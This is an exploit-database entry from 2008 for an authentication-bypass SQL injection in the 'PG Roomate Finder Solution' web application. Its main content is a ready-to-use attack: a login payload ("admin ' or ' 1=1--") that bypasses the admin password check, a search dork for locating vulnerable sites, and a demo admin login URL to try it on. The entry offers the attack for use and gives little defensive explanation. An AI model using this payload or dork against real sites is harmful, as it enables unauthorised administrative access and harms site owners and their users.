id: 4234
date: 11/23/2008
title: PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability
author: ZoRLu
cves: 

====================================================================
PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability
====================================================================


[~] PG Roomate Finder Solution Auth Bypass
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu   
[~]
[~] Date: 23.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: a.q a.q a.q a.q a.q a.q a.q a.q a.q limit(a.q)=sonsuz  ( bIktIm )
[~]
[~] dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"  ( aha size dork :( ( )
[~] -----------------------------------------------------------

Exploit:

username: [real_admin_name] ' or ' 1=1

password: ZoRLu

note: generally admin name: admin 


exploit for demo: 

login: http://www.realtysoft.pro/roommate/demo/admin/index.php

username: admin ' or ' 1=1--

password: ZoRLu

[~]----------------------------------------------------------------------



#  0day.today [2023-03-27]  #